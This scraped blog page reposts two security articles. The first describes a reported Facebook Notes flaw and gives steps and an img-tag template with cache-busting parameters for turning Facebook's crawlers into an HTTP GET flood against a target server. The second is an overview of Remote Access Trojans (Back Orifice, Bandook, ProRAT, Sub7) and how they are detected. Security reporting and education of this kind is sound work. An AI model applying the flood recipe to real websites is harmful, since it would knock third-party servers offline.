id="38931195-6c29-460f-972f-51440e1a3ee4"><span class="GINGER_SOFTWARE_mark" id="62964650-eba4-4da3-894c-eae93adac6c5"><span class="GINGER_SOFTWARE_mark" id="215fceeb-43e0-4daf-9b7f-8f7668eadb1b">a</span></span></span></span></span></span></span></span></span> <<span class="GINGER_SOFTWARE_mark" id="ade9b8f0-8401-4800-a307-b3607f94211d"><span class="GINGER_SOFTWARE_mark" id="44ccb21f-1b7d-4273-b748-58f52d039c24"><span class="GINGER_SOFTWARE_mark" id="d7eae97d-e115-4529-85cf-5463d7ba3afc"><span class="GINGER_SOFTWARE_mark" id="8280f814-9074-4190-a851-4d76b4f7ec52"><span class="GINGER_SOFTWARE_mark" id="fb30fb7c-c28d-4150-9ca8-bf90b51eecee"><span class="GINGER_SOFTWARE_mark" id="50e216a2-4c37-43fb-8d67-6fd81f015c26"><span class="GINGER_SOFTWARE_mark" id="2d9fb578-1188-4697-90d6-dcca37f8de0c"><span class="GINGER_SOFTWARE_mark" id="b8bb2487-7550-4d4a-8bb6-7db34aa0cdf6"><span class="GINGER_SOFTWARE_mark" id="10d62dfe-301f-4da6-9f3d-ceb2222ecfef">img</span></span></span></span></span></span></span></span></span>> tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image <span class="GINGER_SOFTWARE_mark" id="0d86e2e2-dd93-4bc1-9c90-3f4d4facba20"><span class="GINGER_SOFTWARE_mark" id="5cf10dd7-27ae-468f-9bca-ce8f4a641473"><span class="GINGER_SOFTWARE_mark" id="963e021f-a536-4c3c-b21f-453ed9edcca0"><span class="GINGER_SOFTWARE_mark" id="63c10e22-7f5a-450a-ac03-9223fd4b4273"><span class="GINGER_SOFTWARE_mark" id="95fbf830-17d3-4be5-9c1e-2c4546a257d4"><span class="GINGER_SOFTWARE_mark" id="32399de0-329a-4e27-9e53-0022e41409f6"><span class="GINGER_SOFTWARE_mark" id="af3bbb1f-5ae1-4093-9cd2-f4bdbc0e729a"><span class="GINGER_SOFTWARE_mark" id="0fc759bd-05b6-4b1f-8e23-c7d31233a2fd"><span class="GINGER_SOFTWARE_mark" id="145ed796-f8f3-4c98-afb5-897db8523fa0">once however</span></span></span></span></span></span></span></span></span> using random get parameters the cache can be <span class="GINGER_SOFTWARE_mark" id="5a2a3dce-8dbc-4eee-af82-62645471edae"><span class="GINGER_SOFTWARE_mark" id="3e31492c-bf19-4602-9a2d-3a991071e813"><span class="GINGER_SOFTWARE_mark" id="22da61a4-7596-4294-b25a-209270aa8976"><span class="GINGER_SOFTWARE_mark" id="d627fb1e-9ff3-43bb-8e8d-e69946478dcd"><span class="GINGER_SOFTWARE_mark" id="bc22f271-cfd3-478e-b1af-22c09a45a171"><span class="GINGER_SOFTWARE_mark" id="68c7c283-f843-4c35-8152-4ef96f60114b"><span class="GINGER_SOFTWARE_mark" id="1a65ed74-3c65-4f04-8f7e-e5c1d7066e14"><span class="GINGER_SOFTWARE_mark" id="140fccc5-0136-4765-9301-af56f829102f"><span class="GINGER_SOFTWARE_mark" id="408b5e1e-8f1e-4acd-a686-51de4ed1ef63">by-passed</span></span></span></span></span></span></span></span></span> and the feature can be abused to cause a huge HTTP GET flood.”</em></blockquote>
<div>
Let’s see the DDoS attack scenario described by <span class="GINGER_SOFTWARE_mark" id="323f2de0-c650-45dc-9565-167b9a57ba86">Chaman</span> Thapa, let’s chose the target website “<i>target.com”</i> which include a large image on its server (e.g. 1Mb). The researcher creates a <i>Facebook Note</i> which includes the above image multiple times with dynamic parameters, and some text.</div>
<div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
Facebook servers are forced to download 1 <span class="GINGER_SOFTWARE_mark" id="26b924e7-a99a-4003-96d1-a5c6dc353efa">MB of</span> file 1000 times in one <span class="GINGER_SOFTWARE_mark" id="c845d1d5-02d0-4071-994e-c7eb1cbca4ef">page view (It has been estimated that each note is now responsible for 1000+ http requests). </span> If 100 Facebook users are reading the same note at the same time, then Facebook servers will be forced to download<i> 1 x 1000 x 100 = 100,000 <span class="GINGER_SOFTWARE_mark" id="8345dce8-70fb-493d-a9dc-013aa032b690"><span class="GINGER_SOFTWARE_mark" id="f6b1a322-9c87-4045-98b6-ddfe3af3da81"><span class="GINGER_SOFTWARE_mark" id="9e4c6dfc-b76f-4791-8888-57cb9fa9c946"><span class="GINGER_SOFTWARE_mark" id="416b7af8-6a78-4b45-a7ff-506122b95256"><span class="GINGER_SOFTWARE_mark" id="17cc97fe-be6c-4275-99fb-367cf7d8c6c7"><span class="GINGER_SOFTWARE_mark" id="82d0617f-d508-4175-b0c7-2408639056d8"><span class="GINGER_SOFTWARE_mark" id="5d5c8322-64cd-4245-a74b-eae084cb45fc"><span class="GINGER_SOFTWARE_mark" id="a8ca81d3-44c3-4538-8333-6b4a56ae185c"><span class="GINGER_SOFTWARE_mark" id="13151706-46d2-4255-9e0e-f169ab993936"><span class="GINGER_SOFTWARE_mark" id="9a7b3256-8d42-4ff7-8be0-b89dc387b890"><span class="GINGER_SOFTWARE_mark" id="63894ec1-e1ae-4dba-a815-0769b5f5704d">Mb</span></span></span></span></span></span></span></span></span></span></span> or 97.65<span class="GINGER_SOFTWARE_mark" id="ec38ee49-646b-4ffa-95e7-e0d364e1773f"><span class="GINGER_SOFTWARE_mark" id="b43f4d4d-e9c7-4eff-a89b-f95f7075a544"><span class="GINGER_SOFTWARE_mark" id="ad0ecaad-f4f5-4f95-8cbf-9bf8f0984b1d"><span class="GINGER_SOFTWARE_mark" id="a09ef358-65e5-44c8-a63a-151fa9277c70"><span class="GINGER_SOFTWARE_mark" id="11d176c5-6175-46ea-b2ac-392e40ba804f"><span class="GINGER_SOFTWARE_mark" id="c1acbd8e-749b-46f1-a964-3494a82a8f06"><span class="GINGER_SOFTWARE_mark" id="890e282f-c3ae-48b5-97a3-5cc7d72aa1d2"><span class="GINGER_SOFTWARE_mark" id="519577cd-af5b-4c6c-8922-0b65c3955794"><span class="GINGER_SOFTWARE_mark" id="321a3133-0838-4a83-9c57-f5611f395ca0"><span class="GINGER_SOFTWARE_mark" id="a09b2538-9fa2-4933-85f5-f26590f012f1"><span class="GINGER_SOFTWARE_mark" id="4a7dda19-ac5b-4a8f-b0bf-62b6e0d600a5">Gb</span></span></span></span></span></span></span></span></span></span></span></i> bandwidth within few seconds from the targeted servers. In the image below is reported the graph for the 400 Mbps traffic generated from 127 Facebook servers in the proof-of-concept made by Thapa by attacking on his own web server.</div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Facebook-DDoS.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Facebook DDoS" class="aligncenter wp-image-24364" height="160" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Facebook-DDoS.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="How to abuse Facebook feature to conduct powerful DDoS attack" width="488" /></a></div>
</div>
<div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
Following the description provided in the post by the <span class="GINGER_SOFTWARE_mark" id="90d878dc-1e29-4fb3-a8c7-ed60b5e9a695">Chaman</span> Thapa.</div>
</div>
<div>
<div class="separator">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Steps to re-create the bug as reported to Facebook Bug Bounty on March 03, 2014. Step 1. Create a list of unique <span class="GINGER_SOFTWARE_mark" id="dfe7670d-5604-4f8c-86c9-e053e280b61e"><span class="GINGER_SOFTWARE_mark" id="406b16e1-f20d-46a4-bc80-6ebe69712953"><span class="GINGER_SOFTWARE_mark" id="c2965ffc-3175-46e5-86d1-1c4425baab5d"><span class="GINGER_SOFTWARE_mark" id="daa9c3cc-5d60-4460-b9da-ec74ca2b8ad6"><span class="GINGER_SOFTWARE_mark" id="fd704617-229e-4310-8744-f356a02f0064"><span class="GINGER_SOFTWARE_mark" id="6ae3bb41-c490-48d9-8bd0-cfeaa937691e"><span class="GINGER_SOFTWARE_mark" id="48ebf80c-0a85-4f6c-b7cc-b39aad2fe25e"><span class="GINGER_SOFTWARE_mark" id="a4ab67ae-d36e-4d32-8de5-ddd60b05b8af">img</span></span></span></span></span></span></span></span> tags as one tag is crawled only once</em></div>
<pre class="wp-code-highlight prettyprint prettyprinted" style="background-color: #e9ebd9; color: #555555; font-size: 1em; margin-bottom: 10px; margin-top: 10px; overflow: auto; padding: 1em 10px;"><em><span class="tag" style="color: #000088;"><img</span><span class="atn" style="color: #660066;">src</span><span class="pun" style="color: #666600;">=</span><span class="atv" style="color: #008800;">http<span class="GINGER_SOFTWARE_mark" id="e3866708-a5be-4b99-a2d2-6a9e603226de">:</span>//<span class="GINGER_SOFTWARE_mark" id="d6f196f1-4f56-422f-8024-0f5bc19cbda5">targetname</span>/file<span class="GINGER_SOFTWARE_mark" id="c411e9a3-ff58-466d-9b9a-5c01a80e3533">?</span>r=1</span><span class="tag" style="color: #000088;">>
</<span class="GINGER_SOFTWARE_mark" id="2772c3fa-ff5d-49c5-a1e9-73cee6df31c6">img</span>></span><span class="tag" style="color: #000088;"><img</span><span class="atn" style="color: #660066;">src</span><span class="pun" style="color: #666600;">=</span><span class="atv" style="color: #008800;">http<span class="GINGER_SOFTWARE_mark" id="8b9a3ee4-1b62-4b5a-95b1-a2fcbf6accef">:</span>//<span class="GINGER_SOFTWARE_mark" id="bb0d9692-f163-41a5-9070-ffcd1e1e1b90">targetname</span>/file<span class="GINGER_SOFTWARE_mark" id="3a50e152-369f-4dcb-a3c5-bf6511e01754">?</span>r=1</span><span class="tag" style="color: #000088;">></<span class="GINGER_SOFTWARE_mark" id="e70d0688-19fe-4858-a7ca-71e3a2d8eb37">img</span></span><span class="tag" style="color: #000088;">></span><span class="pln">
.</span><span class="pln">.</span><span class="tag" style="color: #000088;"><img</span><span class="atn" style="color: #660066;">src</span><span class="pun" style="color: #666600;">=</span><span class="atv" style="color: #008800;">http<span class="GINGER_SOFTWARE_mark" id="e4d59822-bf4e-4593-bc1d-06c018356f33"><span class="GINGER_SOFTWARE_mark" id="8efd374e-46cf-46b7-b335-93e7736ae61f"><span class="GINGER_SOFTWARE_mark" id="30548eb8-102a-4cca-9481-61137dd57e80"><span class="GINGER_SOFTWARE_mark" id="a5b3f6fe-8b74-4303-8467-a69ae3145661"><span class="GINGER_SOFTWARE_mark" id="21447a54-7ed3-49e7-8165-11d439019073"><span class="GINGER_SOFTWARE_mark" id="8b635a5c-05a1-4f2b-998b-8819af470ca4"><span class="GINGER_SOFTWARE_mark" id="bb8a104d-8d04-4b51-bf0a-1c78aaf27277"><span class="GINGER_SOFTWARE_mark" id="1a51752e-ba5e-4bcd-83ac-2215dadf3195">:</span></span></span></span></span></span></span></span>//<span class="GINGER_SOFTWARE_mark" id="fa7034b2-182d-4df0-ad1b-774ba3c7436f"><span class="GINGER_SOFTWARE_mark" id="1537d68f-6ce6-4191-835b-fdc816129df7"><span class="GINGER_SOFTWARE_mark" id="948a4eed-c242-4146-ab03-d2d6463f677a"><span class="GINGER_SOFTWARE_mark" id="ff5e6a7d-3f78-48c5-acd8-7166a5288e00"><span class="GINGER_SOFTWARE_mark" id="333a2505-ae02-47d0-a361-4a939777934c"><span class="GINGER_SOFTWARE_mark" id="ed4cef30-82aa-4ec3-b67b-26cd9212a673"><span class="GINGER_SOFTWARE_mark" id="d057b413-c807-4f9b-b03e-8dc6dcbe1b62"><span class="GINGER_SOFTWARE_mark" id="b6bb5c2b-6d37-4d63-981b-55eb00021d53">targetname</span></span></span></span></span></span></span></span>/file<span class="GINGER_SOFTWARE_mark" id="0a148441-2473-4bf4-85e3-9ff07d580f3a"><span class="GINGER_SOFTWARE_mark" id="ae594efc-1058-4bf8-acfe-3cd2c120d7b1"><span class="GINGER_SOFTWARE_mark" id="91036ca8-afef-41ec-919f-841b9a3d3978"><span class="GINGER_SOFTWARE_mark" id="1ac5efcd-6511-4081-bcb2-6afe41b3034a"><span class="GINGER_SOFTWARE_mark" id="4837df0d-cd34-4481-821c-3f87395343f6"><span class="GINGER_SOFTWARE_mark" id="e8b55496-5a2c-498d-abfd-a1be6083e3a9"><span class="GINGER_SOFTWARE_mark" id="3085309c-da58-4346-bf28-1eec6d7f0d10"><span class="GINGER_SOFTWARE_mark" id="aec37e59-4268-42a5-a8d8-fb5ce4cbea66">?</span></span></span></span></span></span></span></span>r=1000</span><span class="tag" style="color: #000088;">></<span class="GINGER_SOFTWARE_mark" id="db969020-7236-4842-95d6-aaeafb241f21"><span class="GINGER_SOFTWARE_mark" id="12b53193-4686-4f23-89f6-3edca2f007dc"><span class="GINGER_SOFTWARE_mark" id="ea1f86d3-59ad-4381-9574-1c634665428f"><span class="GINGER_SOFTWARE_mark" id="3f88d848-0e93-4531-b831-3f9d9ce464b2"><span class="GINGER_SOFTWARE_mark" id="30c5ab0a-45f1-45db-929f-f6061178770f"><span class="GINGER_SOFTWARE_mark" id="07d05a40-1031-4bcd-bae6-7eef7a27cacf"><span class="GINGER_SOFTWARE_mark" id="578a8389-292a-458b-9a74-f94e09fb6364"><span class="GINGER_SOFTWARE_mark" id="fab975c2-3318-43c6-a3a7-6f588d0513ff">img</span></span></span></span></span></span></span></span>></span></em></pre>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Step 2. Use m.facebook.com to create the notes. It silently truncates the notes to a fixed length.</em></div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Step 3. Create several notes from the same user or <span class="GINGER_SOFTWARE_mark" id="9ed12bef-f6e3-4b31-8413-7a0bd237f9a9"><span class="GINGER_SOFTWARE_mark" id="d474d50b-364b-4950-8904-c24d50e7f449"><span class="GINGER_SOFTWARE_mark" id="2ef61d11-6579-409d-a551-e2c3bf116e6a"><span class="GINGER_SOFTWARE_mark" id="15319782-8f61-4410-9d50-0b728fd87516"><span class="GINGER_SOFTWARE_mark" id="cc5ebf33-92fe-460c-8bd0-0287b08ef4d3"><span class="GINGER_SOFTWARE_mark" id="74b488a6-1dd6-4bf7-afd1-c31a3461826b"><span class="GINGER_SOFTWARE_mark" id="7d6fefcc-55b7-44f8-a04c-cb4216574f94"><span class="GINGER_SOFTWARE_mark" id="40dbc1bd-dc46-4f52-b52b-b0723539934d">different user</span></span></span></span></span></span></span></span>. Each note is now responsible for 1000+ http request.</em></div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Step 4. View all the notes at the same time. The target server is observed to have massive http get flood. Thousands of get <span class="GINGER_SOFTWARE_mark" id="2f6f0fe6-1aeb-466e-9a70-a40d3f4c58c3"><span class="GINGER_SOFTWARE_mark" id="9bf65c17-c42a-42c9-bc24-861348c021b5"><span class="GINGER_SOFTWARE_mark" id="11ce6ffa-b2cf-42c7-bb9b-6d4c3984a719"><span class="GINGER_SOFTWARE_mark" id="be6267ff-219f-4084-8613-600748500898"><span class="GINGER_SOFTWARE_mark" id="2713cfd0-e158-4d44-97ae-0894ff42fcd2"><span class="GINGER_SOFTWARE_mark" id="451caeeb-4ebc-416f-b653-d7aaede524d4"><span class="GINGER_SOFTWARE_mark" id="1abb10b1-fee8-4fb5-ac18-59e2524d24e9"><span class="GINGER_SOFTWARE_mark" id="e7f4b0c6-7a7b-4bff-a6b1-14349f4b4e2d">request</span></span></span></span></span></span></span></span> are sent to a single server in a couple of seconds. Total number of <span class="GINGER_SOFTWARE_mark" id="ea0663cb-1547-4007-a63a-14b0078b64fd"><span class="GINGER_SOFTWARE_mark" id="873fa33a-f276-4bd3-a6d5-a6083a965f91"><span class="GINGER_SOFTWARE_mark" id="2f7cab1b-4741-4157-9834-7e6bfce36d7c"><span class="GINGER_SOFTWARE_mark" id="85f02f15-7e80-4925-b846-9de858914dc0"><span class="GINGER_SOFTWARE_mark" id="64a8b160-7ce8-4cf8-9f56-e24bbd961fd5"><span class="GINGER_SOFTWARE_mark" id="24f6c845-4d8e-4c74-9c98-a8b70104a651"><span class="GINGER_SOFTWARE_mark" id="7442d2ae-e143-408d-b518-6bad988da99d"><span class="GINGER_SOFTWARE_mark" id="c18a6b87-84f9-4a82-a3d5-ae0e961de66a">facebook</span></span></span></span></span></span></span></span> servers accessing in parallel <span class="GINGER_SOFTWARE_mark" id="abc6a68f-52b0-44e2-a44b-d0f0768d8318"><span class="GINGER_SOFTWARE_mark" id="d897c108-6a77-4915-9ea0-92503a4a3eaf"><span class="GINGER_SOFTWARE_mark" id="b5dcffc7-33a4-43cc-ae02-9becb68705cc"><span class="GINGER_SOFTWARE_mark" id="12139297-f29e-4ce3-b8a1-5d8d2a614b5b"><span class="GINGER_SOFTWARE_mark" id="74069c3b-41b8-404b-ae8b-034893aff4fb"><span class="GINGER_SOFTWARE_mark" id="2bde4352-75f0-4505-b417-483c35293f44"><span class="GINGER_SOFTWARE_mark" id="78bbea1a-065a-479d-b038-6ca58b3f5ca8"><span class="GINGER_SOFTWARE_mark" id="3b7e077c-ee79-4f4b-ac1e-4a0d0ff63d1c">is</span></span></span></span></span></span></span></span> 100+.</em></div>
</div>
</div>
<div>
The researcher explained that the <span class="GINGER_SOFTWARE_mark" id="a1e7ecb8-11b3-48a4-b4dd-f6972e388381">amplification factor</span> of the DDoS attack depends on the dimension of the image downloaded, it could be even higher if the attacker includes in the note a pdf or a video.</div>
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<em>“A scenario of traffic amplification: when the image is replaced by a pdf or video of larger size, Facebook would crawl a huge <span class="GINGER_SOFTWARE_mark" id="1e08b106-ceb2-4afb-a0a7-7d4ab20ffb42"><span class="GINGER_SOFTWARE_mark" id="68cd1fcb-71cd-40c9-bbf3-d6cdd27c0e05"><span class="GINGER_SOFTWARE_mark" id="c9b831b0-11fe-481b-b800-eca324bbae5b"><span class="GINGER_SOFTWARE_mark" id="e173a4cb-75ec-4688-b208-ef73e9d98caa"><span class="GINGER_SOFTWARE_mark" id="ebced14b-7d09-4229-b5ec-333b1a5de5d4">file but</span></span></span></span></span> the user gets nothing.” “Each Note supports 1000+ links and Facebook blocks a user after creating around 100 Notes in a short span. Since there is no <span class="GINGER_SOFTWARE_mark" id="4e76a7fc-0303-41aa-818e-a0024c818dce"><span class="GINGER_SOFTWARE_mark" id="ddcc7099-0e50-4dc8-841f-057149f634a3"><span class="GINGER_SOFTWARE_mark" id="429e0984-2ae3-447a-af91-64cd81f02d54"><span class="GINGER_SOFTWARE_mark" id="7e841243-ebd3-4f5c-ac2a-b7b5e894f0b3"><span class="GINGER_SOFTWARE_mark" id="fc071fbb-14fa-48d9-aaa5-c3be7563e8c1">captcha</span></span></span></span></span> for note creation, all of this can be automated and an attacker could easily prepare hundreds of notes using multiple users until the time of <span class="GINGER_SOFTWARE_mark" id="0f2d1922-6f1e-4734-8329-042f19926ae9"><span class="GINGER_SOFTWARE_mark" id="dc7b4155-3c74-4547-bd5b-c107260e6830"><span class="GINGER_SOFTWARE_mark" id="03b59040-a2b4-4981-a4fe-4ac492b0b1ec"><span class="GINGER_SOFTWARE_mark" id="7ef5d533-5187-4673-9ffa-437ab0743eaf"><span class="GINGER_SOFTWARE_mark" id="86226a18-c234-425c-aacd-ae3ad54f918a">attack</span></span></span></span></span> when all of them is viewed at once.” noted Chaman Thapa.</em></blockquote>
<div>
There is the concrete risk that a bad actor <span class="GINGER_SOFTWARE_mark" id="0ba1e4c5-9941-41fa-8992-62a9e08755d9">creates</span> hundreds of notes with specially crafted script using multiple users at the same <span class="GINGER_SOFTWARE_mark" id="c2cc49d7-8dd2-43c2-9efc-62e4f7858588">time, resulting a</span> powerful DDoS <span class="GINGER_SOFTWARE_mark" id="99540cbb-97d1-4ade-96b8-cd9965609764">attack</span>.</div>
<div>
</div>
<div>
The alarming news is that the flaw is still <span class="GINGER_SOFTWARE_mark" id="9274ddc3-7518-42b9-a48d-4c7f9b26d02a">unpached</span> and Facebook has no plans to fix it.</div>
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
“<i>In the end, the conclusion is that there’s no real way to us fix this that would stop attacks against small consumer grade sites without also significantly degrading the overall functionality,</i>” replied Facebook to the researcher.</blockquote>
<a href="http://securityaffairs.co/wordpress/24359/cyber-crime/use-facebook-ddos-attack.html" target="_blank">http://securityaffairs.co/wordpress/24359/cyber-crime/use-facebook-ddos-attack.html</a> </div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-19635950794542134232014-04-28T21:34:00.001-07:002014-04-28T21:34:29.982-07:00[infosecinstitute] Remote Access Tool<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Remote Access Tool is a piece of software used to remotely access or control a computer. This tool can be used legitimately by system administrators for accessing the client computers. Remote Access tools, when used for malicious purposes, are known as a Remote Access Trojan (RAT). They can be used by a malicious user to control the system without the knowledge of the victim. Most of the popular RATs are capable of performing key logging, screen and camera capture, file access, code execution, registry management, password sniffing etc.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
RAT can also be called as a synonym for backdoor, which includes a client and server program. The server or the stub program, if installed in the compromised system unknowingly by the owner of that system, then it is called as a Remote Access Trojan.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Remote Administration Trojans (RATs) are malicious pieces of software and infect the victim’s machine to gain administrative access. They are often included in pirated software through patches, as a form of cracked game or E-mail attachments. After the infection, it may perform unauthorized operations and hide their presence in the infected system. An attacker can remotely control the system by gaining the key logs, webcam feeds, audio footage, screen captures, etc.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
RATs normally obfuscate their presence by changing the name, size, and often their behavior or encryption methods. By doing this they evade from AV, firewalls, IDS, IPS and security defense systems. Excluding the remote access capabilities, some RATs also behave as a backdoor to the system by infecting it with viruses, worms, spyware, adware, etc. Thus, the infected machines can also be used as a bot or zombie to carry out a chain of attacks to other machines including DDOS.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>RAT Detection</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
RATs can be avoided by verifying each piece of software before installation by using authorized program signatures. This programs signature may be available from the vendors of the products; however, it may become difficult to correlate this procedure in an organizational level. In addition, the RATs are using varied level of obfuscation methods to hide their characteristics from detection system. RAT normally injects to legitimate pieces of software or even distributed as patches or other updates, which make them difficult to be captured.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Various host and network based detection methodologies can be correlated to the proper detection of the RATs. In host-based detection, the unique characteristics of the RAT can be stores in a database level that contains the file name, size, checksum and other unique characteristics. This RAT database can be scanned with the new programs and if matching patterns are found, then can be recognized as RAT. The startup files, registries, auto start and configuration scripts can be monitored and if any distinguished behavior is detected can be detected as a RAT.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In network based detection method, the network communication protocols can be monitored to check whether if any deviation is there in the behavior of network usage. Ports can be monitored for exceptional behavior, and can analyze protocol headers of packet among the systems. The network traffic can be analyzed and the RAT behavior patterns can distinguished among other legitimate traffic.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Types of RAT</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Back Orifice</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Back Orifice 2000 (BO2K) was released in July 1999 at DefCon VII, a computer hacker convention held in Las Vegas, Nevada. It was developed by a computer hacker group named “The Cult of the Dead Cow.”</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
BO2K is a client/server application that can remotely controls an information processing application with a fixed IP (Internet Protocol) address by hiding it presence from the victim machine. After its installation, BO2K gathers information, performs system commands, reconfigures machines, and redirects network traffic to unauthorized services.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This RAT should be installed by the end user, and then it will perform its function unknowingly to the user. The B02K installation involves two separate operation, including the client and server .The server part should is an executable one and normally comes in the bo2k.exe name.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces1.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces1.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
B02K has a configuration interface, which can be used to setup the functionality of the program. The configuration interface can be used to setup the Server file, network protocol including TCP or UDP, Port number, encryption mechanism, and password encryption key.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
B02K client interface has a list of servers that displays the list of compromised servers and this server has its name, IP address, and connection information. Several commands can be used to gather data from victim machine and this command can be executed using the attacker machine by giving the intended parameters. The responses can be seen using the Server Response window.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Bandook RAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Bandook RAT has the ability of process injection, API unhooking, bypass the Windows firewall etc. In this, the client has the ability to extend the functionality of the server by sending plugin code to it. The server has capability to hide it by creating a process using the default browser settings.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Bandook has been programmed using a combination of C++ and Delphi. It doesn’t uses any cryptographic methods to encrypt, but uses a XORing method. In this, the server part is installed on System32 folder on Windows OS and on its execution; it establishes a connection to attacker, listen for incoming connections on the specified port. Then the attacker can execute the specified server command on the victim’s machine. It has spying features like screen manager with screen clicks, cam manager that supports system with multiple cams, live key logger, cache reader, screen recorder etc.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The server component (28,200 bytes) is dropped under Windows, System32 or Program Files, Applications folders, the default name is ali.exe. Once the server component is run, it establishes a connection to the attacking client that listens for incoming connections on a configurable port to allow the attacker to execute arbitrary code from a computer.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>ProRAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
ProRAT is a Remote Access Trojan that contains the client and server architecture. It operates by opening a port on the computer that allows attacker to execute several commands on the victim’s machine. This RAT has the capability of logging keystrokes, stealing passwords, taking screen shots, view webcam, download and run files etc.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This RAT has features that enable them to undetected from antivirus and firewall; it can run stealthily on the background. It also has the ability to disable and delete system restore points, removing security software, displaying error messages etc.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Sub7 RAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Sub7 RAT executes on the machine in an undetected and unauthorized manner. Sub7 worked on Windows 9x to Windows XP range OS. Sub7 also has the same architecture of other RAT and allows an attacker to execute server side commands and gain access and information.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
One of the distinguished features of Sub7 RAT is that, it has an address book that allows the attacker to whether the victim’s computer is online or not.</div>
